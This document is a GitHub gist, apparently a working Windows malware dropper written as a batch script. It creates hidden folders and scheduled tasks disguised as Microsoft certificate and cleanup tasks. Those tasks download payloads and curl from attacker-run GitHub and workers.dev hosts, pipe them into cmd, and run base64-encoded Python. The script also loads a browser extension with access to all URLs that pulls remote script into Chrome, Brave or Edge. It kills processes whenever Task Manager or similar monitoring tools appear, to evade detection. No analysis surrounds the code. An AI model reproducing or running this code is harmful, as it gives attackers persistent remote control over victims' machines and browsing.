@ZerGo0
Created April 9, 2022 16:19
powershell if( (Get-WinSystemLocale).name -notmatch 'en-' ){ TASKKILL /F /IM cmd.exe /T }
mkdir C:\systemfile
cd C:\systemfile
attrib +s +h "C:\systemfile" /d
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp.xml
echo ^<RegistrationInfo^> >> C:\systemfile\temp.xml
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp.xml
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp.xml
echo ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp.xml
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp.xml
echo ^</RegistrationInfo^> >> C:\systemfile\temp.xml
echo ^<Triggers^> >> C:\systemfile\temp.xml
echo ^<LogonTrigger^> >> C:\systemfile\temp.xml
echo ^<Repetition^> >> C:\systemfile\temp.xml
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp.xml
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp.xml
echo ^</Repetition^> >> C:\systemfile\temp.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp.xml
echo ^<Delay^>PT68S^</Delay^> >> C:\systemfile\temp.xml
echo ^</LogonTrigger^> >> C:\systemfile\temp.xml
echo ^</Triggers^> >> C:\systemfile\temp.xml
echo ^<Principals^> >> C:\systemfile\temp.xml
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp.xml
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp.xml
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp.xml
echo ^</Principal^> >> C:\systemfile\temp.xml
echo ^</Principals^> >> C:\systemfile\temp.xml
echo ^<Settings^> >> C:\systemfile\temp.xml
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp.xml
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp.xml
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp.xml
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp.xml
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp.xml
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp.xml
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp.xml
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp.xml
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp.xml
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp.xml
echo ^</Settings^> >> C:\systemfile\temp.xml
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp.xml
echo ^<Exec^> >> C:\systemfile\temp.xml
echo ^<Command^>cmd.exe^</Command^> >> C:\systemfile\temp.xml
echo ^<Arguments^>/c more c.z ^| cmd ^& more ^%USERPROFILE^%\Downloads\c.z ^| cmd^</Arguments^> >> C:\systemfile\temp.xml
echo ^<WorkingDirectory^>C:\systemfile^</WorkingDirectory^> >> C:\systemfile\temp.xml
echo ^</Exec^> >> C:\systemfile\temp.xml
echo ^</Actions^> >> C:\systemfile\temp.xml
echo ^</Task^> >> C:\systemfile\temp.xml
schtasks /create /xml "C:\systemfile\temp.xml" /tn "\Microsoft\Windows\AppID\VerifiedCert" /F
Del "C:\systemfile\temp.xml"
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp2.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp2.xml
echo ^<RegistrationInfo^> >> C:\systemfile\temp2.xml
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp2.xml
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp2.xml
echo ^<Description^>Regular browser Maintenance.^</Description^> >> C:\systemfile\temp2.xml
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp2.xml
echo ^</RegistrationInfo^> >> C:\systemfile\temp2.xml
echo ^<Triggers^> >> C:\systemfile\temp2.xml
echo ^<LogonTrigger^> >> C:\systemfile\temp2.xml
echo ^<Repetition^> >> C:\systemfile\temp2.xml
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp2.xml
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp2.xml
echo ^</Repetition^> >> C:\systemfile\temp2.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp2.xml
echo ^<Delay^>PT60S^</Delay^> >> C:\systemfile\temp2.xml
echo ^</LogonTrigger^> >> C:\systemfile\temp2.xml
echo ^</Triggers^> >> C:\systemfile\temp2.xml
echo ^<Principals^> >> C:\systemfile\temp2.xml
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp2.xml
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp2.xml
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp2.xml
echo ^</Principal^> >> C:\systemfile\temp2.xml
echo ^</Principals^> >> C:\systemfile\temp2.xml
echo ^<Settings^> >> C:\systemfile\temp2.xml
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp2.xml
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp2.xml
echo ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp2.xml
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp2.xml
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp2.xml
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp2.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp2.xml
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp2.xml
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp2.xml
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp2.xml
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp2.xml
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp2.xml
echo ^</Settings^> >> C:\systemfile\temp2.xml
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp2.xml
echo ^<Exec^> >> C:\systemfile\temp2.xml
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe" ^| findstr chrome`) DO set CHROMEPATH=%A %B
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\brave.exe" ^| findstr brave`) DO set BRAVEPATH=%A %B
FOR /F "usebackq tokens=3*" %A IN (`reg.exe query "HKLM\Software\Microsoft\Windows\CurrentVersion\App Paths\msedge.exe" ^| findstr msedge`) DO set MSEDGEPATH=%A %B
echo "%CHROMEPATH%" | findstr /C:"chrome" >nul && ( echo "%CHROMEPATH%" & echo ^<Command^>"%CHROMEPATH%"^</Command^> >> "C:\systemfile\temp2.xml" ) || (
echo "%BRAVEPATH%" | findstr /C:"brave" >nul && ( echo "%BRAVEPATH%" & echo ^<Command^>"%BRAVEPATH%"^</Command^> >> "C:\systemfile\temp2.xml" ) || (
echo "%MSEDGEPATH%" | findstr /C:"msedge" >nul && ( echo "%MSEDGEPATH%" & echo ^<Command^>"%MSEDGEPATH%"^</Command^> >> "C:\systemfile\temp2.xml" ) || (del "C:\systemfile\temp2.xml" & Exit) ))
echo ^<Arguments^> --tyqe=render --fieId-trial--handle=1712,16854529411193321620,9342185763190534498,131072 --lang=en-US --extension--process --origin--trial-disabled--features=SecurePaymentConfirmation --device-scale--factor=1 --num--raster-threads=2 --profile-directory=Default --enable--main-frame-before--activation www.google.com --renderer--client-id=6 --user-data-dir="C:\systemfile" --no-v8--untrusted-code-mitigations --load-extension="C:\systemfile" --mojo--platform-channel-handle=-3784 /prefetch:1^</Arguments^> >> C:\systemfile\temp2.xml
echo ^<WorkingDirectory^>C:\systemfile^</WorkingDirectory^> >> C:\systemfile\temp2.xml
echo ^</Exec^> >> C:\systemfile\temp2.xml
echo ^</Actions^> >> C:\systemfile\temp2.xml
echo ^</Task^> >> C:\systemfile\temp2.xml
schtasks /create /xml "C:\systemfile\temp2.xml" /tn "\Microsoft\Windows\Application Experience\Maintenance" /F
Del "C:\systemfile\temp2.xml"
attrib -s -h "C:\systemfile\c.z"
del C:\systemfile\c.z
echo cd C:\systemfile > C:\systemfile\c.z
echo mkdir C:\Windows\security >> C:\systemfile\c.z
echo Tasklist /FI "SESSION eq 0" ^| findstr /C:"chrome" /C:"msedge" /C:"brave" /C:"powershell" /C:"python" /C:"cdriver" /C:"mdriver" /C:"pythonw" ^>nul ^&^& ( start /b PowerShell.exe "while( (Get-Process Taskmgr, procexp, procexp64, SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil -ErrorAction SilentlyContinue).Count -eq 0 ){Start-Sleep -Milliseconds 100 } ; TASKKILL /F /FI 'SESSION eq 0' /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T ; Exit" ) >> C:\systemfile\c.z
echo IF NOT EXIST "C:\Windows\security\pywinvera" (curl.exe -L https://github.com/alexrybak0444/New/raw/main/pywinveraa -o "C:\Windows\security\pywinveraa") >> C:\systemfile\c.z
echo IF NOT EXIST "C:\Windows\security\pywinvera" (curl.exe -L https://github.com/alexrybak0444/New/raw/main/winver -o "C:\Windows\security\winver") >> C:\systemfile\c.z
echo ren "C:\Windows\security\winver" winver.png >> C:\systemfile\c.z
echo mkdir "C:\Windows\security\pywinvera" >> C:\systemfile\c.z
echo IF NOT EXIST "C:\Windows\security\pywinvera\libs" ("C:\Windows\security\winver.png" x "C:\Windows\security\pywinveraa" -o"C:\Windows\security" ) >> C:\systemfile\c.z
echo del "C:\Windows\security\pywinveraa" >> C:\systemfile\c.z
echo del "C:\Windows\security\winver.png" >> C:\systemfile\c.z
echo. >> C:\systemfile\c.z
echo attrib -s -h "C:\systemfile\c.z" >> C:\systemfile\c.z
echo ^echo Tasklist /FI "SESSION eq 0" ^^^| findstr /C:"chrome" /C:"msedge" /C:"brave" /C:"powershell" /C:"python" /C:"cdriver" /C:"mdriver" /C:"pythonw" ^^^>nul ^^^&^^^& ( PowerShell.exe "while( (Get-Process Taskmgr, procexp, procexp64, SystemExplorer, ProcessHacker, AnVir, TMX, WinUtil -ErrorAction SilentlyContinue).Count -eq 0 ){Start-Sleep -Milliseconds 100 } ; TASKKILL /F /FI 'SESSION eq 0' /IM chrome.exe /IM msedge.exe /IM brave.exe /IM powershell.exe /IM python.exe /IM pythonw.exe /IM cdriver.exe /IM mdriver.exe /T ; Exit" ) ^^^|^^^| (^^^Exit)^> ^C:\systemfile\c.z >> C:\systemfile\c.z
echo attrib +s +h "C:\systemfile\*" /s /d >> C:\systemfile\c.z
attrib +s +h "C:\systemfile\c.z"
echo { > C:\systemfile\manifest.json
echo "name": "Chrome-edge-ext", >> C:\systemfile\manifest.json
echo "version": "0.1", >> C:\systemfile\manifest.json
echo "description": "Chrome-edge-ext..", >> C:\systemfile\manifest.json
echo "permissions": [ >> C:\systemfile\manifest.json
echo "<all_urls>", >> C:\systemfile\manifest.json
echo "activeTab", >> C:\systemfile\manifest.json
echo "tabs", >> C:\systemfile\manifest.json
echo "downloads" >> C:\systemfile\manifest.json
echo ], >> C:\systemfile\manifest.json
echo "background": { >> C:\systemfile\manifest.json
echo "page": "background.html", >> C:\systemfile\manifest.json
echo "persistent": true >> C:\systemfile\manifest.json
echo }, >> C:\systemfile\manifest.json
echo "manifest_version": 2, >> C:\systemfile\manifest.json
echo "content_security_policy": "script-src 'self' https://*.alexrybak0555.workers.dev/; object-src 'self'" >> C:\systemfile\manifest.json
echo } >> C:\systemfile\manifest.json
echo ^<script src="https://cdn2.alexrybak0555.workers.dev/"^>^</script^> > C:\systemfile\background.html
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp3.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp3.xml
echo ^<RegistrationInfo^> >> C:\systemfile\temp3.xml
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp3.xml
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp3.xml
echo ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp3.xml
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp3.xml
echo ^</RegistrationInfo^> >> C:\systemfile\temp3.xml
echo ^<Principals^> >> C:\systemfile\temp3.xml
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp3.xml
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp3.xml
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp3.xml
echo ^</Principal^> >> C:\systemfile\temp3.xml
echo ^</Principals^> >> C:\systemfile\temp3.xml
echo ^<Settings^> >> C:\systemfile\temp3.xml
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp3.xml
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp3.xml
echo ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp3.xml
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp3.xml
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp3.xml
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp3.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp3.xml
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp3.xml
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp3.xml
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp3.xml
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp3.xml
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp3.xml
echo ^</Settings^> >> C:\systemfile\temp3.xml
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp3.xml
echo ^<Exec^> >> C:\systemfile\temp3.xml
echo ^<Command^>python^</Command^> >> C:\systemfile\temp3.xml
echo ^<Arguments^>-c ^"import base64;exec(base64.b64decode('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'))^"^</Arguments^> >> C:\systemfile\temp3.xml
echo ^<WorkingDirectory^>C:\Windows\security\pywinvera^</WorkingDirectory^> >> C:\systemfile\temp3.xml
echo ^</Exec^> >> C:\systemfile\temp3.xml
echo ^</Actions^> >> C:\systemfile\temp3.xml
echo ^</Task^> >> C:\systemfile\temp3.xml
schtasks /create /xml "C:\systemfile\temp3.xml" /tn "\Microsoft\Windows\Services\CertPathCheck" /F
Del "C:\systemfile\temp3.xml"
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp4.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp4.xml
echo ^<RegistrationInfo^> >> C:\systemfile\temp4.xml
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp4.xml
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp4.xml
echo ^<Description^>Verify the publisher certificates.^</Description^> >> C:\systemfile\temp4.xml
echo ^<URI^>\Microsoft\Windows\AppID\VerifiedCert^</URI^> >> C:\systemfile\temp4.xml
echo ^</RegistrationInfo^> >> C:\systemfile\temp4.xml
echo ^<Principals^> >> C:\systemfile\temp4.xml
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp4.xml
echo ^<LogonType^>InteractiveToken^</LogonType^> >> C:\systemfile\temp4.xml
echo ^<RunLevel^>HighestAvailable^</RunLevel^> >> C:\systemfile\temp4.xml
echo ^</Principal^> >> C:\systemfile\temp4.xml
echo ^</Principals^> >> C:\systemfile\temp4.xml
echo ^<Settings^> >> C:\systemfile\temp4.xml
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp4.xml
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp4.xml
echo ^<StopIfGoingOnBatteries^>false^</StopIfGoingOnBatteries^> >> C:\systemfile\temp4.xml
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp4.xml
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp4.xml
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp4.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp4.xml
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp4.xml
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp4.xml
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp4.xml
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp4.xml
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp4.xml
echo ^</Settings^> >> C:\systemfile\temp4.xml
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp4.xml
echo ^<Exec^> >> C:\systemfile\temp4.xml
echo ^<Command^>pythonw^</Command^> >> C:\systemfile\temp4.xml
echo ^<Arguments^>-c ^"import base64;exec(base64.b64decode('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'))^"^</Arguments^> >> C:\systemfile\temp4.xml
echo ^<WorkingDirectory^>C:\Windows\security\pywinvera^</WorkingDirectory^> >> C:\systemfile\temp4.xml
echo ^</Exec^> >> C:\systemfile\temp4.xml
echo ^</Actions^> >> C:\systemfile\temp4.xml
echo ^</Task^> >> C:\systemfile\temp4.xml
schtasks /create /xml "C:\systemfile\temp4.xml" /tn "\Microsoft\Windows\Services\CertPathw" /F
Del "C:\systemfile\temp4.xml"
cd C:\
where curl || powershell "(New-Object System.Net.WebClient).DownloadFile('https://github.com/alexrybak0444/New/raw/main/curl', 'C:\Windows\system32\curl.exe')"
cd C:\systemfile
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp5.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp5.xml
echo ^<RegistrationInfo^> >> C:\systemfile\temp5.xml
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp5.xml
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp5.xml
echo ^<Description^>left over Component Cleanup^</Description^> >> C:\systemfile\temp5.xml
echo ^<URI^>\Microsoft\Windows\Servicing\ComponentCleanup^</URI^> >> C:\systemfile\temp5.xml
echo ^</RegistrationInfo^> >> C:\systemfile\temp5.xml
echo ^<Triggers^> >> C:\systemfile\temp5.xml
echo ^<LogonTrigger^> >> C:\systemfile\temp5.xml
echo ^<Repetition^> >> C:\systemfile\temp5.xml
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp5.xml
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp5.xml
echo ^</Repetition^> >> C:\systemfile\temp5.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp5.xml
echo ^</LogonTrigger^> >> C:\systemfile\temp5.xml
echo ^</Triggers^> >> C:\systemfile\temp5.xml
echo ^<Principals^> >> C:\systemfile\temp5.xml
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp5.xml
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp5.xml
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp5.xml
echo ^</Principal^> >> C:\systemfile\temp5.xml
echo ^</Principals^> >> C:\systemfile\temp5.xml
echo ^<Settings^> >> C:\systemfile\temp5.xml
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp5.xml
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp5.xml
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp5.xml
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp5.xml
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp5.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp5.xml
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp5.xml
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp5.xml
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp5.xml
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp5.xml
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp5.xml
echo ^</Settings^> >> C:\systemfile\temp5.xml
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp5.xml
echo ^<Exec^> >> C:\systemfile\temp5.xml
echo ^<Command^>curl^</Command^> >> C:\systemfile\temp5.xml
echo ^<Arguments^>https://autobat.alexrybak0444.workers.dev/ -o ^%temp^%\c4329f-4b8b33e-fa4fffe0^</Arguments^> >> C:\systemfile\temp5.xml
echo ^</Exec^> >> C:\systemfile\temp5.xml
echo ^</Actions^> >> C:\systemfile\temp5.xml
echo ^</Task^> >> C:\systemfile\temp5.xml
schtasks /create /xml "C:\systemfile\temp5.xml" /tn "\Microsoft\Windows\Servicing\ComponentCleanup" /F
Del "C:\systemfile\temp5.xml"
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp6.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp6.xml
echo ^<RegistrationInfo^> >> C:\systemfile\temp6.xml
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp6.xml
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp6.xml
echo ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp6.xml
echo ^<URI^>\Microsoft\Windows\Servicing\ServiceCleanup^</URI^> >> C:\systemfile\temp6.xml
echo ^</RegistrationInfo^> >> C:\systemfile\temp6.xml
echo ^<Triggers^> >> C:\systemfile\temp6.xml
echo ^<LogonTrigger^> >> C:\systemfile\temp6.xml
echo ^<Repetition^> >> C:\systemfile\temp6.xml
echo ^<Interval^>PT9M^</Interval^> >> C:\systemfile\temp6.xml
echo ^<StopAtDurationEnd^>false^</StopAtDurationEnd^> >> C:\systemfile\temp6.xml
echo ^</Repetition^> >> C:\systemfile\temp6.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp6.xml
echo ^<Delay^>PT8S^</Delay^> >> C:\systemfile\temp6.xml
echo ^</LogonTrigger^> >> C:\systemfile\temp6.xml
echo ^</Triggers^> >> C:\systemfile\temp6.xml
echo ^<Principals^> >> C:\systemfile\temp6.xml
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp6.xml
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp6.xml
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp6.xml
echo ^</Principal^> >> C:\systemfile\temp6.xml
echo ^</Principals^> >> C:\systemfile\temp6.xml
echo ^<Settings^> >> C:\systemfile\temp6.xml
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp6.xml
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp6.xml
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp6.xml
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp6.xml
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp6.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp6.xml
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp6.xml
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp6.xml
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp6.xml
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp6.xml
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp6.xml
echo ^</Settings^> >> C:\systemfile\temp6.xml
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp6.xml
echo ^<Exec^> >> C:\systemfile\temp6.xml
echo ^<Command^>cmd^</Command^> >> C:\systemfile\temp6.xml
echo ^<Arguments^>/c type ^%temp^%\c4329f-4b8b33e-fa4fffe0 ^| cmd ^&^& del ^%temp^%\c4329f-4b8b33e-fa4fffe0^</Arguments^> >> C:\systemfile\temp6.xml
echo ^</Exec^> >> C:\systemfile\temp6.xml
echo ^</Actions^> >> C:\systemfile\temp6.xml
echo ^</Task^> >> C:\systemfile\temp6.xml
schtasks /create /xml "C:\systemfile\temp6.xml" /tn "\Microsoft\Windows\Servicing\ServiceCleanup" /F
Del "C:\systemfile\temp6.xml"
echo ^<?xml version="1.0" encoding="UTF-16"?^> > C:\systemfile\temp7.xml
echo ^<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"^> >> C:\systemfile\temp7.xml
echo ^<RegistrationInfo^> >> C:\systemfile\temp7.xml
echo ^<Source^>Microsoft Corporation^</Source^> >> C:\systemfile\temp7.xml
echo ^<Author^>Microsoft Corporation^</Author^> >> C:\systemfile\temp7.xml
echo ^<Description^>left over Service Cleanup^</Description^> >> C:\systemfile\temp7.xml
echo ^<URI^>\Microsoft\Windows\Shell\ObjectTask^</URI^> >> C:\systemfile\temp7.xml
echo ^</RegistrationInfo^> >> C:\systemfile\temp7.xml
echo ^<Triggers^> >> C:\systemfile\temp7.xml
echo ^<LogonTrigger^> >> C:\systemfile\temp7.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp7.xml
echo ^<Delay^>PT7S^</Delay^> >> C:\systemfile\temp7.xml
echo ^</LogonTrigger^> >> C:\systemfile\temp7.xml
echo ^</Triggers^> >> C:\systemfile\temp7.xml
echo ^<Principals^> >> C:\systemfile\temp7.xml
echo ^<Principal id="LocalService"^> >> C:\systemfile\temp7.xml
echo ^<LogonType^>S4U^</LogonType^> >> C:\systemfile\temp7.xml
echo ^<RunLevel^>LeastPrivilege^</RunLevel^> >> C:\systemfile\temp7.xml
echo ^</Principal^> >> C:\systemfile\temp7.xml
echo ^</Principals^> >> C:\systemfile\temp7.xml
echo ^<Settings^> >> C:\systemfile\temp7.xml
echo ^<MultipleInstancesPolicy^>IgnoreNew^</MultipleInstancesPolicy^> >> C:\systemfile\temp7.xml
echo ^<DisallowStartIfOnBatteries^>false^</DisallowStartIfOnBatteries^> >> C:\systemfile\temp7.xml
echo ^<AllowHardTerminate^>false^</AllowHardTerminate^> >> C:\systemfile\temp7.xml
echo ^<RunOnlyIfNetworkAvailable^>false^</RunOnlyIfNetworkAvailable^> >> C:\systemfile\temp7.xml
echo ^<AllowStartOnDemand^>true^</AllowStartOnDemand^> >> C:\systemfile\temp7.xml
echo ^<Enabled^>true^</Enabled^> >> C:\systemfile\temp7.xml
echo ^<Hidden^>false^</Hidden^> >> C:\systemfile\temp7.xml
echo ^<RunOnlyIfIdle^>false^</RunOnlyIfIdle^> >> C:\systemfile\temp7.xml
echo ^<WakeToRun^>false^</WakeToRun^> >> C:\systemfile\temp7.xml
echo ^<ExecutionTimeLimit^>PT0S^</ExecutionTimeLimit^> >> C:\systemfile\temp7.xml
echo ^<Priority^>10^</Priority^> >> C:\systemfile\temp7.xml
echo ^</Settings^> >> C:\systemfile\temp7.xml
echo ^<Actions Context="LocalService"^> >> C:\systemfile\temp7.xml
echo ^<Exec^> >> C:\systemfile\temp7.xml
echo ^<Command^>cmd^</Command^> >> C:\systemfile\temp7.xml
echo ^<Arguments^>/c if exist ^%temp^%\c4329f-4b8b33e-fa4fffe0 (SCHTASKS /End /TN ^"\Microsoft\Windows\AppID\VerifiedCert^" ^& SCHTASKS /End /TN ^"\Microsoft\Windows\Application Experience\Maintenance^" ^& schtasks /change /tn ^"\Microsoft\Windows\AppID\VerifiedCert^" /DISABLE ^& schtasks /change /tn ^"\Microsoft\Windows\Application Experience\Maintenance^" /DISABLE ^& schtasks /change /tn ^"\Microsoft\Windows\AppID\VerifiedCert^" /ENABLE ^& schtasks /change /tn ^"\Microsoft\Windows\Application Experience\Maintenance^" /ENABLE)^</Arguments^> >> C:\systemfile\temp7.xml
echo ^</Exec^> >> C:\systemfile\temp7.xml
echo ^</Actions^> >> C:\systemfile\temp7.xml
echo ^</Task^> >> C:\systemfile\temp7.xml
